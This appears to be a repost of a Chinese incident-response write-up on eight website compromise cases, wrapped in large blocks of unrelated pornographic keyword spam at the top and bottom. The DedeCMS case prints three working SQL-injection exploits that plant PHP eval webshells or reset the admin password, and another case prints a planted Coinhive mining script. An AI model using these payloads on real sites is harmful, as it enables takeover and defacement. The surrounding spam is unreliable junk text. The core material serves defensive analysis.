精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

應急響應系列之Web實戰篇

安全 應用安全
這是一個關于安全事件應急響應的項目,從系統入侵到事件處理,收集和整理了一些案例進行分析。

當我還在做安服的時候,我的主要工作是滲透測試和應急響應。兩年前,我開始著手去整理一些應急響應案例,脫敏保留特定特征的場景,試圖以最簡單直觀的方式去還原一個個應急場景。

現在,我將這些文檔通過另一種更加開放的形式進行分享,歡迎 Star,歡迎 issue。

  • GitHub 地址:https://github.com/Bypass007/Emergency-Response-Notes
  • GitBook 地址:https://bypass007.github.io/Emergency-Response-Notes/

項目介紹

面對各種各樣的安全事件,我們該怎么處理?

這是一個關于安全事件應急響應的項目,從系統入侵到事件處理,收集和整理了一些案例進行分析。

我將持續更新這份筆記,希望能幫到有需要的人。

如果你看到好的案例,歡迎通過 issue 提交,歡迎 Star 予以支持。

第 1 篇:網站被植入 Webshell

網站被植入 webshell,意味著網站存在可利用的高危漏洞,攻擊者通過利用漏洞入侵網站,寫入 webshell 接管網站的控制權。為了得到權限 ,常規的手段如:前后臺任意文件上傳,遠程命令執行,Sql 注入寫入文件等。

1. 現象描述

網站管理員在站點目錄下發現存在 webshell,于是開始了對入侵過程展開了分析。

Webshell 查殺工具:

  • D 盾_Web 查殺 Window下webshell 查殺:http://www.d99net.net/index.asp
  • 河馬:支持多平臺,但是需要聯網環境。
  • 使用方法:wget http://down.shellpub.com/hm/latest/hm-linux-amd64.tgz tar xvf hm-linux-amd64.tgz hm scan /www

2. 事件分析

(1) 定位時間范圍

通過發現的 webshell 文件創建時間點,去翻看相關日期的訪問日志。

(2) Web 日志分析

經過日志分析,在文件創建的時間節點并未發現可疑的上傳,但發現存在可疑的 webservice 接口

(3) 漏洞分析

訪問 webservice 接口,發現變量:buffer、distinctpach、newfilename 可以在客戶端自定義

(4) 漏洞復現

嘗試對漏洞進行復現,可成功上傳 webshell,控制網站服務器

(5) 漏洞修復

清除 webshell 并對 webservice 接口進行代碼修復。

從發現 webshell 到日志分析,再到漏洞復現和修復,本文暫不涉及溯源取證方面。

第 2 篇:門羅幣惡意挖礦

門羅幣 (Monero 或 XMR),它是一個非常注重于隱私、匿名性和不可跟蹤的加密數字貨幣。只需在網頁中配置好js腳本,打開網頁就可以挖礦,是一種非常簡單的挖礦方式,而通過這種惡意挖礦獲取數字貨幣是黑灰色產業獲取收益的重要途徑。

1. 現象描述

利用 XMR 惡意挖礦,會大量占用用戶的 CPU 資源,嚴重影響了網站的用戶體驗。

從 08/09 日 0 點開始,局域網內某 IP 訪問網站頁面會觸發安全預警,只要訪問此服務器上的網頁,CPU 直線上升100%

2. 問題解析

通過獲取惡意網頁 url,對網頁頁面進行分析,發現網站頁面被植入在線門羅幣挖礦代碼:

  1. <script> var script = document.createElement('script'); script.onload = function () { // XMR Pool hash var m = new CoinHive.Anonymous('BUSbODwUSryGnrIwy3o6Fhz1wsdz3ZNu'); // TODO: Replace the below string with wallet string m.start('47DuVLx9UuD1gEk3M4Wge1BwQyadQs5fTew8Q3Cxi95c8W7tKTXykgDfj7HVr9aCzzUNb9vA6eZ3eJCXE9yzhmTn1bjACGK'); }; script.src = 'https://coinhive.com/lib/coinhive.min.js'; document.head.appendChild(script); </script> 

 

刪除 js 里面的惡意代碼,網站被 XMR 惡意挖礦,服務器已經被攻擊,進一步做服務器入侵排查。

第3篇:批量掛黑頁

作為一個網站管理員,你采用開源 CMS 做網站,比如 dedecms,但是有一天,你忽然發現不知何時,網站的友情鏈接模塊被掛大量垃圾鏈接,網站出現了很多不該有的目錄,里面全是博彩相關的網頁。而且,攻擊者在掛黑頁以后,會在一些小論壇注冊馬甲將你的網站黑頁鏈接發到論壇,引爬蟲收錄。在搜索引擎搜索網站地址時,收錄了一些會出現一些博彩頁面,嚴重影響了網站形象。

1. 原因分析

網站存在高危漏洞,常見于一些存在安全漏洞的開源 CMS,利用 0day 批量拿站上傳黑頁。

2. 現象描述:

某網站被掛了非常多博彩鏈接,鏈接形式如下:

  • http://www.xxx.com/upload/aomendduchangzaixiandobo/index.html
  • http://www.xxx.com/upload/aomendduchangzaixian/index.html
  • http://www.xxx.com/upload/aomenzhengguidubowangzhan/index.html

鏈接可以訪問,直接訪問物理路徑也可以看到文件,但是打開網站目錄并沒有發現這些文件,這些文件到底藏在了哪?

訪問這些鏈接,跳轉到如圖頁面:

3. 問題處理:

(1) 打開電腦文件夾選項卡,取消”隱藏受保護的操作系統文件“勾選,把”隱藏文件和文件夾“下面的單選選擇“顯示隱藏的文件、文件夾和驅動器”。

(2) 再次查看,可以看到半透明的文件夾,清楚隱藏文件夾及所有頁面

(3) 然后清除 IIS 臨時壓縮文件

  1. C:\inetpub\temp\IIS Temporary Compressed Files\WEBUI$^_gzip_D^\WEB\WEBUI\UPLOAD 

(4) 投訴快照,申請刪除相關的網頁收錄,減少對網站的影響。

第 4 篇:新聞源網站劫持

新聞源網站一般權重較高,收錄快,能夠被搜索引擎優先收錄,是黑灰產推廣引流的必爭之地,很容易成為被攻擊的對象。被黑以后主要掛的不良信息內容主要是博彩六合彩等賭博類內容,新聞源網站程序無論是自主開發的還是開源程序,都有被黑的可能,開源程序更容易被黑。

1. 現象描述:

某新聞源網站首頁廣告鏈接被劫持到菠菜網站

 

有三個廣告專題,鏈接形式如下:

  • http://www.xxx.cn/zhuanti/yyysc/index.shtml
  • http://www.xxx.cn/zhuanti/wwwsc/index.shtml
  • http://www.xxx.cn/zhuanti/zzzsc/index.shtml

點擊這三條鏈接會跳轉到博彩網站。簡單抓包分析一下過程:

可以發現此時這個返回頁面已被劫持,并且加載了第三方 js 文件,http://xn--dpqw2zokj.com/N/js/dt.js

進一步訪問該文件:

dt.js 進一步加載了另一條js,訪問:http://xn--dpqw2zokj.com/N/js/yz.js

我們發現鏈接跳轉到https://lemcoo.com/?dt

進一步訪問這個鏈接,網站為博彩鏈接導航網站,訪問后會隨機跳轉到第三方賭博網站。

2. 問題處理:

找到 url 對應的文件位置,即使文件被刪除,鏈接依然可以訪問,可以發現三條鏈接都是以“sc”后綴。

對 Nginx 配置文件進行排查,發現 Nginx 配置文件 VirtualHost.conf 被篡改,通過反向代理匹配以“sc”后綴的專題鏈接,劫持到 http://103.233.248.163,該網站為博彩鏈接導航網站。

刪除惡意代理后,專題鏈接訪問恢復。

第 5 篇:移動端劫持

PC 端訪問正常,移動端訪問出現異常,比如插入彈窗、嵌入式廣告和跳轉到第三方網站,將干擾用戶的正常使用,對用戶體驗造成極大傷害。

1. 現象描述

部分網站用戶反饋,手機打開網站就會跳轉到賭博網站。

2. 問題處理

訪問網站首頁,抓取到了一條惡意 js:http://js.zadovosnjppnywuz.com/caonima.js

我們可以發現,攻擊者通過這段 js 代碼判斷手機訪問來源,劫持移動端(如手機、ipad、Android等)流量,跳轉到

https://262706.com

進一步訪問 https://262706.com,跳轉到賭博網站:

第 6 篇:搜索引擎劫持

當你直接打開網址訪問網站,是正常的,可是當你在搜索引擎結果頁中打開網站時,會跳轉到一些其他網站,比如博彩,虛假廣告,淘寶搜索頁面等。是的,你可能了遇到搜索引擎劫持。

1. 現象描述

從搜索引擎來的流量自動跳轉到指定的網頁

2. 問題處理

通過對 index.php 文件進行代碼分析,發現該文件代碼 對來自搜狗和好搜的訪問進行流量劫持。

進一步跟著 include 函數包含的文件,index,php 包含 /tmp/.ICE-unix/.. /c.jpg。

進入 /tmp 目錄進行查看,發現該目錄下,如 c.jpg 等文件,包含著一套博彩劫持的程序。

第 7 篇:網站首頁被篡改

網站首頁被非法篡改,是的,就是你一打開網站就知道自己的網站出現了安全問題,網站程序存在嚴重的安全漏洞,攻擊者通過上傳腳本木馬,從而對網站內容進行篡改。而這種篡改事件在某些場景下,會被無限放大。

1. 現象描述

網站首頁被惡意篡改,比如復制原來的圖片,PS 一下,然后替換上去。

2. 問題處理

(1) 確認篡改時間

通過對被篡改的圖片進行查看,確認圖片篡改時間為 2018 年 04 月 18 日 19:24:07 。

(2) 訪問日志溯源

通過圖片修改的時間節點,發現可疑IP:113.xx.xx.24 (代理IP,無法追溯真實來源),訪問 image.jsp(腳本木馬),并隨后訪問了被篡改的圖片地址。

進一步審查所有的日志文件(日志保存時間從 2017-04-20 至 2018-04-19),發現一共只有兩次訪問 image.jsp 文件的記錄,分別是 2018-04-18 和 2017-09-21。

image.jsp在 2017-09-21之 前就已經上傳到網站服務器,已經潛藏長達半年多甚至更久的時間。

(3) 尋找真相

我們在網站根目錄找到了答案,發現站點目錄下存在 ROOT.rar 全站源碼備份文件,備份時間為 2017-02-28 10:35。

通過對 ROOT.rar 解壓縮,發現源碼中存在的腳本木馬與網站訪問日志的可疑文件名一致(image.jsp)。

根據這幾個時間節點,我們嘗試去還原攻擊者的攻擊路徑。

但是我們在訪問日志并未找到 ROOT.rar 的訪問下載記錄,訪問日志只保留了近一年的記錄,而這個 webshell 可能已經存在了多年。

黑客是如何獲取 webshell 的呢?

可能是通過下載 ROOT.rar 全站源碼備份文件獲取到其中存在的木馬信息,或者幾年前入侵并潛藏了多年,又或者是從地下黑產購買了 shell,我們不得而知。

本文的示例中攻擊者為我們留下了大量的證據和記錄,而更多時候,攻擊者可能會清除所有的關鍵信息,這勢必會加大調查人員的取證難度。

第 8 篇:管理員賬號被篡改

你是某一個網站的管理員,有一天,你的管理員賬號 admin 卻登錄不了,進入數據庫查看,原來管理員賬號用戶名不存在了,卻多了另外一個管理員用戶名。不對,不是新增了管理員,而是你的管理員用戶名被篡改了。

1. 現象描述

前后端分離,后臺只允許內網訪問,管理員賬號 admin 卻依然被多次被篡改

2. 問題處理

(1) 網站 webshell

在針對網站根目錄進行 webshell 掃描,發現存在腳本木馬,創建時間為 2018-06-13 04:30:30

(2) 定位 IP

通過木馬創建時間, 查看網站訪問日志,定位到 IP 為:180.xx.xx.3

(3) 關聯分析

全局搜索與該 IP 有關的操作日志:

在腳本木馬生成前,有兩條比較可疑的訪問日志吸引了我們的注意:

  1. 172.16.1.12 180.xx.xxx.3 - - [10/Jun/2018:08:41:43 +0800] "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=114&arrs2[]=101&arrs2[]=97&arrs2[]=100&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35 HTTP/1.1" 200 67 
  2. 172.16.1.12 180.xx.xxx.3 - - [10/Jun/2018:08:41:43 +0800] "GET /plus/ad_js.php?aid=19 HTTP/1.1" 200 32 

對這段 POC 進行解碼,我們發現通過這個 poc 可以往數據庫中插入數據,進一步訪問 /plus/ad_js.php?aid=19即可在 plus 目錄生成 read.php 腳本文件。

解碼后:

  1. cfg_dbprefixmyadSETnormbody= '<?php file_put_contents(''read.php'',''<?php eval($_POST[x]);echo mOon;?>'');?>' WHEREaid` =19 #  

綜上,可以推測 /plus/download.php 中可能存在 SQL 注入漏洞,接下來,收集網上已公開的有以下 3 種 EXP進行漏洞復現。

3. 漏洞復現

利用方式一:修改后臺管理員

(1) 新建管理員賬號 test/test123789,可以成功登錄網站后臺

(2) 構造如下注入 SQL 語句:

  1. cfg_dbprefixadmin SETuserid='spider',pwd`='f297a57a5a743894a0e4' where id=19 # 

修改后臺管理員為:用戶名 spider,密碼 admin。

(3) 對應的 EXP:

  1. open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35 

執行 EXP 后,相應后臺數據庫表變為如下:

(4) 因此相應后臺登錄用戶變為 spider 密碼 admin

利用方式二:通過/plus/mytag_js.php文件生成一句話木馬php

  • 如:構造如下注入 SQL 語句:
  1. `cfg_dbprefixmytag(aid,expbody,normbody) VALUES(9013,@','{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @'`` 
  • 對應的 EXP:
    1. ?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 
  • 執行 EXP 后,將向數據庫表 dede_mytag 中插入一條記錄,
  • 執行如下語句,在 /plus 目錄下生成 90sec.php 一句話木馬:http://www.xxxx.com/plus/mytag_js.php?aid=9013

利用方式三:使 /plus/ad_js.php 文件變為一句話木馬 php

如:

  • 構造如下注入 SQL 語句:
    1. cfg_dbprefixmyadSETnormbody= '<?php file_put_contents(''read.php'',''<?php eval($_POST[x]);echo mOon;?>'');?>' WHEREaid` =19 # 
  • 對應的 EXP:
    1. /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=114&arrs2[]=101&arrs2[]=97&arrs2[]=100&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35 
  • 執行 EXP 后,將向數據庫表 dede_myad 中插入一條記錄。
  • 進一步訪問 /plus/ad_js.php?aid=19 即可在 plus 目錄生成 read.php 腳本文件。

4. 如何清除?

  • 刪除網站目錄中的 webshell
  • 清除 dede_myad、dede_mytag 數據庫表中插入的 SQL 語句,防止再次被調用生成 webshell。

5. 如何防御?

網站采用開源 CMS 搭建,建議及時對官方發布的系統補丁以及內核版本進行升級。

責任編輯:趙寧寧 來源: 信安之路
相關推薦

2019-06-17 11:10:29

Linux工具應急響應

2023-03-03 14:07:06

2016-08-31 09:19:57

2019-10-24 10:28:06

2021-09-08 09:48:39

數據庫工具技術

2023-07-07 06:53:56

遠程軟件日志向日葵

2009-06-15 16:05:30

設計AnnotatioJava

2021-07-02 10:10:55

SecurityJWT系統

2009-07-04 11:26:12

unix應急安全攻略

2019-05-15 10:05:19

主機安全Linux安全系統安全

2018-01-10 09:33:18

數據庫SQL查詢優化Java Web

2017-11-08 13:31:34

分層架構代碼DDD

2021-07-05 08:41:49

RedisGEO系統

2010-01-11 21:19:57

2021-04-29 09:40:32

測試IDEAirtest

2018-05-08 18:26:49

數據庫MySQL性能

2015-08-26 09:45:32

應急響應反滲透企業應急響應

2019-12-06 09:16:23

Linux 開源操作系統

2016-12-09 13:45:21

RNN大數據深度學習

2010-11-09 10:03:26

點贊
收藏

51CTO技術棧公眾號

麻豆一区二区三| 欧美三级午夜理伦三级在线观看| 亚洲国产精品v| 国产精品视频网| 久久久久亚洲av成人无码电影| 日韩欧美看国产| 国产精品电影一区二区| 97夜夜澡人人双人人人喊| 久久9999久久免费精品国产| 日本欧美高清| 欧美日韩黄色一区二区| 国产精品三级一区二区| 男生女生差差差的视频在线观看| 蜜臀av性久久久久蜜臀aⅴ| 欧美成人午夜激情视频| 亚洲观看黄色网| 在线成人视屏| 亚洲欧美偷拍另类a∨色屁股| 国产精品av一区| 久久精品99北条麻妃| 欧美福利专区| 在线观看精品国产视频| 深夜视频在线观看| 日韩不卡视频在线观看| 亚洲国产成人av| 亚洲精品第一区二区三区| 亚洲精品97久久中文字幕无码| 久久国产直播| 欧美激情喷水视频| 在线观看日本黄色| 欧美亚洲tv| 91精品国产一区二区人妖| 18禁男女爽爽爽午夜网站免费| 欧美成人三区| 久久精品在线观看| 国产一区二区免费在线观看| 91免费视频播放| 久久国产高清| 久久久久久尹人网香蕉| 国产免费一区二区三区四区| 亚洲精品一级二级三级| 精品久久一区二区三区| 中文av一区二区三区| 中国字幕a在线看韩国电影| 亚洲精品免费播放| 亚洲一区尤物| 成人免费在线观看| 久久久无码精品亚洲日韩按摩| 岛国一区二区三区高清视频| 国产欧美第一页| 久久er精品视频| 国产精品一二区| 日本在线视频免费| 亚洲电影av| 精品自拍视频在线观看| 疯狂试爱三2浴室激情视频| 色偷偷综合网| 深夜福利一区二区| 天天躁夜夜躁狠狠是什么心态| 青草久久视频| 日韩h在线观看| 国产精品麻豆入口| 动漫av一区| 精品对白一区国产伦| 女女调教被c哭捆绑喷水百合| 国产精品一区二区精品| 欧美一级国产精品| 亚洲v在线观看| 精品丝袜久久| 日韩激情片免费| 四虎永久免费在线观看| 经典一区二区| 少妇久久久久久| 黄色录像一级片| 夜间精品视频| 欧美激情综合亚洲一二区| 欧美日韩综合一区二区| 一区在线播放| 欧美性视频精品| 成人a v视频| 蜜桃久久精品一区二区| 亚洲一区二区三区香蕉| 亚洲精品一区二区三区四区| 成a人片亚洲日本久久| 精品卡一卡二| 二区三区在线| 亚洲欧美另类久久久精品| 欧美日韩福利在线| 欧美大片1688| 4438x成人网最大色成网站| 不用播放器的免费av| 亚洲高清999| 亚洲国产精品va在线观看黑人| 国产精品久久不卡| 成人嫩草影院| 欧美精品一区三区| 久久久国产高清| 秋霞国产午夜精品免费视频| 亚洲一区二区三区久久| 三级理论午夜在线观看| 国产精品三级在线观看| 久久久久久久久久伊人| 波多野结衣亚洲一二三| 欧美日韩不卡一区二区| 国产精品久久久久久亚洲色| 国产欧美日韩精品一区二区免费| 不卡av在线网站| 日韩 欧美 综合| 蜜臀av性久久久久蜜臀aⅴ四虎| 99在线免费观看视频| 欧美3p视频在线观看| 亚洲欧美一区二区三区国产精品| 国产v片免费观看| 久久精品资源| 亚洲国产第一页| 长河落日免费高清观看| 亚洲激情网站| 91热福利电影| 国产中文字幕在线观看| 亚洲一区二区高清| 国产无遮挡猛进猛出免费软件| 欧美变态网站| 久久在线免费观看视频| 免费观看日批视频| 成人毛片老司机大片| 中文字幕一区二区三区最新| 345成人影院| 日韩美女视频在线| 老司机深夜福利网站| 欧美资源在线| 国产免费一区二区| 一二三四区在线观看| 欧美性一级生活| 日韩aaaaa| 午夜精品亚洲| 91精品视频在线免费观看| 精品电影在线| 欧美日韩精品在线播放| 在线播放第一页| 中文精品电影| 91免费高清视频| 午夜免费视频在线国产| 91九色02白丝porn| 欧美色图亚洲激情| 99在线精品免费视频九九视| 国产精品久久久对白| 伊人影院在线视频| 日韩欧美国产精品一区| 青青草原在线免费观看| 国内成人自拍视频| 一区二区不卡在线| 国语自产精品视频在线看抢先版结局 | 在线看国产日韩| 欧美肉大捧一进一出免费视频| 欧美日韩一区二区国产| 亚洲最大av网| 永久免费网站在线| 日韩美一区二区三区| 国产人妻精品一区二区三区不卡| 久久精品72免费观看| 亚洲欧洲国产日韩精品| 久久亚洲精品人成综合网| 色av吧综合网| 在线免费a视频| 国产精品国产三级国产普通话三级 | 中文字幕在线播出| 国产精品九色蝌蚪自拍| 激情文学亚洲色图| 欧美精品97| 国产亚洲欧美另类一区二区三区| 999av小视频在线| 精品爽片免费看久久| 四虎成人在线观看| 国产午夜精品久久久久久久| 欧美精品成人网| 日本一二区不卡| 亚洲一区二区三区四区在线播放 | 中文字幕精品—区二区| 亚洲综合网av| 亚洲伦在线观看| 韩国三级视频在线观看| 国产美女一区| 亚洲精品日韩精品| 国产精品国产三级在线观看| 欧美激情乱人伦一区| 亚欧在线观看视频| 欧美午夜寂寞影院| 久久亚洲成人av| 91麻豆文化传媒在线观看| 丰满少妇在线观看| 国产精品99一区二区三区| 91精品天堂| 国产ktv在线视频| 亚洲天堂男人天堂| 97超碰中文字幕| 亚洲成人激情av| 91麻豆精品国产91久久综合| 国产伦精品一区二区三区免费| 波多野结衣之无限发射| 成人羞羞网站入口| 国产精品一区二区免费| av免费在线一区| 欧美精品在线免费播放| 欧美zozo| 欧美一区二区三区性视频| 日韩三级一区二区三区| 国产精品久久久久久久裸模| 久久久久久婷婷| 免费成人在线网站| 成人一区二区免费视频| 成人中文在线| 国产一区二区无遮挡| 岛国精品在线| **欧美日韩vr在线| 爆操欧美美女| 亚洲性无码av在线| 好吊视频一二三区| 在线成人av网站| 欧美亚洲另类小说| 亚洲一区二区三区自拍| 免费成人深夜蜜桃视频| 国产成人免费视频网站高清观看视频| 欧美xxxxx在线视频| 欧美日韩国产免费观看| 亚洲欧洲国产日韩精品| 欧美日韩播放| 成人欧美一区二区三区在线观看| 伦一区二区三区中文字幕v亚洲| 性日韩欧美在线视频| av网站在线免费| 色七七影院综合| 久草视频在线看| 日韩毛片在线观看| 天天操天天爱天天干| 欧美成人免费网站| 国产精品-色哟哟| 91久久线看在观草草青青| 日韩三级一区二区三区| 亚洲一区二区三区中文字幕| 亚洲xxxx3d动漫| 国产精品久久毛片av大全日韩| 高潮毛片无遮挡| 99久久婷婷国产| 国产 xxxx| 成人永久看片免费视频天堂| 最好看的中文字幕| 精品一区二区三区欧美| 久久国产激情视频| 日本欧美在线观看| 妓院一钑片免看黄大片| 另类图片国产| 国产欧美在线一区| 久久国产直播| www.国产区| 日韩精品国产欧美| 人人爽人人av| 美女脱光内衣内裤视频久久网站 | 国产精品日韩一区二区| 99这里只有精品视频| 国产99在线免费| 成人另类视频| 精品在线不卡| 日本精品影院| 欧洲亚洲一区二区三区四区五区| 伊人久久大香线蕉综合网蜜芽| 欧美二级三级| 精品国产中文字幕第一页| 亚洲精品tv久久久久久久久| 999国产精品视频| 精品少妇人妻av一区二区| 影视亚洲一区二区三区| 成人在线免费观看视频网站| 好吊视频一区二区三区四区| 成 年 人 黄 色 大 片大 全| 免费亚洲婷婷| 日本久久精品一区二区| 狠狠色丁香婷综合久久| 国产精品日日摸夜夜爽| av高清不卡在线| www.自拍偷拍| 欧美激情一区二区三区不卡| 四虎精品免费视频| 舔着乳尖日韩一区| 精品一区二区无码| 56国语精品自产拍在线观看| 